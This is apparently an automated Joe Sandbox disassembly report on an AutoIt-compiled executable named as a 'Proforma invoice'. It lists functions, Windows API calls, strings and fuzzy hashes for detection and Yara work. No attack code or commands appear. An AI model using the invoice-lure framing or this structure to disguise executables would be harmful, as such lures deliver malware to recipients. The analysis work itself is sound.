                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                    • API String ID: 699586101-1459072770
                                                                                                                    • Opcode ID: 1885b275bf57635baffe735baf78fba5d89967a6731c424313a8f846c7735977
                                                                                                                    • Instruction ID: 5775ffc8adef33cc0d7214739a064a384370044d56df71e578a5bff9126e448a
                                                                                                                    • Opcode Fuzzy Hash: 1885b275bf57635baffe735baf78fba5d89967a6731c424313a8f846c7735977
                                                                                                                    • Instruction Fuzzy Hash: 67412A31920205BBDB10FB749C47EFF776CDF45750F044066F909A6183EB319A219BA9
                                                                                                                    Function 002527D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002528BC
                                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 002528C4
                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002528EF
                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 002528F7
                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 0025291C
                                                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00252939
                                                                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00252949
                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0025297C
                                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00252990
                                                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 002529AE
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 002529CA
                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 002529D5
                                                                                                                      • Part of subcall function 00252344: GetCursorPos.USER32(?), ref: 00252357
                                                                                                                      • Part of subcall function 00252344: ScreenToClient.USER32(003157B0,?), ref: 00252374
                                                                                                                      • Part of subcall function 00252344: GetAsyncKeyState.USER32(00000001), ref: 00252399
                                                                                                                      • Part of subcall function 00252344: GetAsyncKeyState.USER32(00000002), ref: 002523A7
                                                                                                                    • SetTimer.USER32(00000000,00000000,00000028,00251256), ref: 002529FC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                    • String ID: AutoIt v3 GUI
                                                                                                                    • API String ID: 1458621304-248962490
                                                                                                                    • Opcode ID: 5ff7805634c7657c1f8866f1c52a75240a0a32bda8a69fab73edc8a491505fe6
                                                                                                                    • Instruction ID: b0c597b3ceb003c0b3363cce3e122b74369fc4e1876c3e40520653926271a8c2
                                                                                                                    • Opcode Fuzzy Hash: 5ff7805634c7657c1f8866f1c52a75240a0a32bda8a69fab73edc8a491505fe6
                                                                                                                    • Instruction Fuzzy Hash: ECB1AD31A1120ADFDB15DFA8DD89BED7BA4FB48311F108129FA16A62D0DB70D864CB64
                                                                                                                    Function 002AA439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 002AA47A
                                                                                                                    • __swprintf.LIBCMT ref: 002AA51B
                                                                                                                    • _wcscmp.LIBCMT ref: 002AA52E
                                                                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 002AA583
                                                                                                                    • _wcscmp.LIBCMT ref: 002AA5BF
                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 002AA5F6
                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 002AA648
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 002AA67E
                                                                                                                    • GetParent.USER32(?), ref: 002AA69C
                                                                                                                    • ScreenToClient.USER32(00000000), ref: 002AA6A3
                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 002AA71D
                                                                                                                    • _wcscmp.LIBCMT ref: 002AA731
                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 002AA757
                                                                                                                    • _wcscmp.LIBCMT ref: 002AA76B
                                                                                                                      • Part of subcall function 0027362C: _iswctype.LIBCMT ref: 00273634
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                                    • String ID: %s%u
                                                                                                                    • API String ID: 3744389584-679674701
                                                                                                                    • Opcode ID: 4598033d8bc6e0b6f8ea17cdf98f5eb8fb0d29a3514253ac0fdd07d325216914
                                                                                                                    • Instruction ID: 5a79f4e485a70296eaf2bebec0938a50f5e893e24e46e69c8366e8615f7cac7c
                                                                                                                    • Opcode Fuzzy Hash: 4598033d8bc6e0b6f8ea17cdf98f5eb8fb0d29a3514253ac0fdd07d325216914
                                                                                                                    • Instruction Fuzzy Hash: A7A1BF71624207ABDB15DF60CC84BAAF7E8FF45354F00852AF99AD2190DB30E965CB92
                                                                                                                    Function 002AAED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 002AAF18
                                                                                                                    • _wcscmp.LIBCMT ref: 002AAF29
                                                                                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 002AAF51
                                                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 002AAF6E
                                                                                                                    • _wcscmp.LIBCMT ref: 002AAF8C
                                                                                                                    • _wcsstr.LIBCMT ref: 002AAF9D
                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 002AAFD5
                                                                                                                    • _wcscmp.LIBCMT ref: 002AAFE5
                                                                                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 002AB00C
                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 002AB055
                                                                                                                    • _wcscmp.LIBCMT ref: 002AB065
                                                                                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 002AB08D
                                                                                                                    • GetWindowRect.USER32(00000004,?), ref: 002AB0F6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                    • String ID: @$ThumbnailClass
                                                                                                                    • API String ID: 1788623398-1539354611
                                                                                                                    • Opcode ID: 103c02510f23a694eb99a264771d2685696d5d9f3fad64357fcbf210c95f471f
                                                                                                                    • Instruction ID: 0fdec10b8968f214d071ed7a2176da413a42f1304e7ca03fb147f89748d70c2e
                                                                                                                    • Opcode Fuzzy Hash: 103c02510f23a694eb99a264771d2685696d5d9f3fad64357fcbf210c95f471f
                                                                                                                    • Instruction Fuzzy Hash: CF81B2711282069FDB05DF14C885FAA77E8FF45314F04846AFD899A092DF34DDA9CBA1
                                                                                                                    Function 002DC5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623
                                                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 002DC627
                                                                                                                      • Part of subcall function 002DAB37: ClientToScreen.USER32(?,?), ref: 002DAB60
                                                                                                                      • Part of subcall function 002DAB37: GetWindowRect.USER32(?,?), ref: 002DABD6
                                                                                                                      • Part of subcall function 002DAB37: PtInRect.USER32(?,?,002DC014), ref: 002DABE6
                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 002DC690
                                                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002DC69B
                                                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002DC6BE
                                                                                                                    • _wcscat.LIBCMT ref: 002DC6EE
                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 002DC705
                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 002DC71E
                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 002DC735
                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 002DC757
                                                                                                                    • DragFinish.SHELL32(?), ref: 002DC75E
                                                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 002DC851
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb1
                                                                                                                    • API String ID: 169749273-3371520547
                                                                                                                    • Opcode ID: 1b8dc524575648548c5e6ceca43b2134d84b652e2e48c7dc4775eb706c5ed4a7
                                                                                                                    • Instruction ID: 8627e2140f9f3c9df9a3e886a13171346428f6d3830daf6e9cc6175edf3db542
                                                                                                                    • Opcode Fuzzy Hash: 1b8dc524575648548c5e6ceca43b2134d84b652e2e48c7dc4775eb706c5ed4a7
                                                                                                                    • Instruction Fuzzy Hash: AC618D71519301AFC701DF64DC89DABBBE8EF88310F00092EF991962A1DB709A59CF96
                                                                                                                    Function 002AABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wcsnicmp
                                                                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                    • API String ID: 1038674560-1810252412
                                                                                                                    • Opcode ID: cf28f1d9c0f0ed96c80ae85057c3bd70bf2844a908ff1d4d965819c47544b29e
                                                                                                                    • Instruction ID: 8764bc7005fa34539bbba8d2cc7f50f4c350d571f74f1057e7f04d0f6ff4ed22
                                                                                                                    • Opcode Fuzzy Hash: cf28f1d9c0f0ed96c80ae85057c3bd70bf2844a908ff1d4d965819c47544b29e
                                                                                                                    • Instruction Fuzzy Hash: 8F31E830A69206ABEB15FA50DD13EEE7769AF11721F20001AF802711D1EF717F28CE56
                                                                                                                    Function 002C4FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 002C5013
                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 002C501E
                                                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 002C5029
                                                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 002C5034
                                                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 002C503F
                                                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 002C504A
                                                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 002C5055
                                                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 002C5060
                                                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 002C506B
                                                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 002C5076
                                                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 002C5081
                                                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 002C508C
                                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 002C5097
                                                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 002C50A2
                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 002C50AD
                                                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 002C50B8
                                                                                                                    • GetCursorInfo.USER32(?), ref: 002C50C8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Cursor$Load$Info
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2577412497-0
                                                                                                                    • Opcode ID: 8a3f4064e7aa5a79f208f60aa0874d899c26aae16a63a8ce911fca83ec9b5e8f
                                                                                                                    • Instruction ID: a151e510e35440d052a3cec637df18fa31c557d870bf952a552c043bf9e6893c
                                                                                                                    • Opcode Fuzzy Hash: 8a3f4064e7aa5a79f208f60aa0874d899c26aae16a63a8ce911fca83ec9b5e8f
                                                                                                                    • Instruction Fuzzy Hash: A33115B1D1831A6ADF109FB68C89D5FBFE8FF08750F50452AA50DE7280DA78A540CF95
                                                                                                                    Function 002DA1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 002DA259
                                                                                                                    • DestroyWindow.USER32(?,?), ref: 002DA2D3
                                                                                                                      • Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06
                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 002DA34D
                                                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 002DA36F
                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002DA382
                                                                                                                    • DestroyWindow.USER32(00000000), ref: 002DA3A4
                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00250000,00000000), ref: 002DA3DB
                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002DA3F4
                                                                                                                    • GetDesktopWindow.USER32 ref: 002DA40D
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 002DA414
                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 002DA42C
                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 002DA444
                                                                                                                      • Part of subcall function 002525DB: GetWindowLongW.USER32(?,000000EB), ref: 002525EC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                    • String ID: 0$tooltips_class32
                                                                                                                    • API String ID: 1297703922-3619404913
                                                                                                                    • Opcode ID: 9bfb588feb8fb2ae4f72226d928a6b3d8427a6ddaa5d3b37a042cfeff259e3fb
                                                                                                                    • Instruction ID: e26d32ccbdc18a75820a6676708ad7e0352044c091c3cd385fba7fc63b18b902
                                                                                                                    • Opcode Fuzzy Hash: 9bfb588feb8fb2ae4f72226d928a6b3d8427a6ddaa5d3b37a042cfeff259e3fb
                                                                                                                    • Instruction Fuzzy Hash: 93717B71650205AFD725CF28DC49FA677EAFB88304F04451EF985872A0DBB0ED16CB56
                                                                                                                    Function 002D4392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 002D4424
                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002D446F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                    • API String ID: 3974292440-4258414348
                                                                                                                    • Opcode ID: deacdedb3433cf26019a0218450a5ad3f30f39f820bcff118e1599d2a6d53075
                                                                                                                    • Instruction ID: 110f30bbce071f843a133e531f6a3a83ca6dd06a31793362f8e1438932c07973
                                                                                                                    • Opcode Fuzzy Hash: deacdedb3433cf26019a0218450a5ad3f30f39f820bcff118e1599d2a6d53075
                                                                                                                    • Instruction Fuzzy Hash: D49190742247019FCB04EF10C851A6EB7E5AF95750F04886AFC965B3A2CB30EDA9CF85
                                                                                                                    Function 002DB7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 002DB8B4
                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,002D91C2), ref: 002DB910
                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 002DB949
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 002DB98C
                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 002DB9C3
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 002DB9CF
                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 002DB9DF
                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,002D91C2), ref: 002DB9EE
                                                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 002DBA0B
                                                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 002DBA17
                                                                                                                      • Part of subcall function 00272EFD: __wcsicmp_l.LIBCMT ref: 00272F86
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                    • String ID: .dll$.exe$.icl
                                                                                                                    • API String ID: 1212759294-1154884017
                                                                                                                    • Opcode ID: 4048f1ce422c76a99631a69cfe29914350e9139c77241ebbf325db2ed8d97bf9
                                                                                                                    • Instruction ID: 8e4e26b8aac9e130534ba4d6cf2cc23d7a7f448160c374c0452a034853fa4737
                                                                                                                    • Opcode Fuzzy Hash: 4048f1ce422c76a99631a69cfe29914350e9139c77241ebbf325db2ed8d97bf9
                                                                                                                    • Instruction Fuzzy Hash: 4B61FD71920209FAEB15DF64DC55FFE7BA8EB08721F108116F915D62C0DB70AEA0DBA0
                                                                                                                    Function 002BA352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
                                                                                                                      • Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC
                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 002BA3CB
                                                                                                                    • GetDriveTypeW.KERNEL32 ref: 002BA418
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002BA460
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002BA497
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002BA4C5
                                                                                                                      • Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                    • API String ID: 2698844021-4113822522
                                                                                                                    • Opcode ID: e145d23eb6761b4fc406a0bc5ff929be54156ebcd560372b949552dc079f334d
                                                                                                                    • Instruction ID: 19ac910a164c82de3a4f685062d576c55a588d2f27b8a3053450fd3b530e5958
                                                                                                                    • Opcode Fuzzy Hash: e145d23eb6761b4fc406a0bc5ff929be54156ebcd560372b949552dc079f334d
                                                                                                                    • Instruction Fuzzy Hash: E7517E715243059FC700EF10C8958AAB3F8EF98759F00886DF89A572A1DB31ED1ACF96
                                                                                                                    Function 002AF8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0028E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 002AF8DF
                                                                                                                    • LoadStringW.USER32(00000000,?,0028E029,00000001), ref: 002AF8E8
                                                                                                                      • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0028E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 002AF90A
                                                                                                                    • LoadStringW.USER32(00000000,?,0028E029,00000001), ref: 002AF90D
                                                                                                                    • __swprintf.LIBCMT ref: 002AF95D
                                                                                                                    • __swprintf.LIBCMT ref: 002AF96E
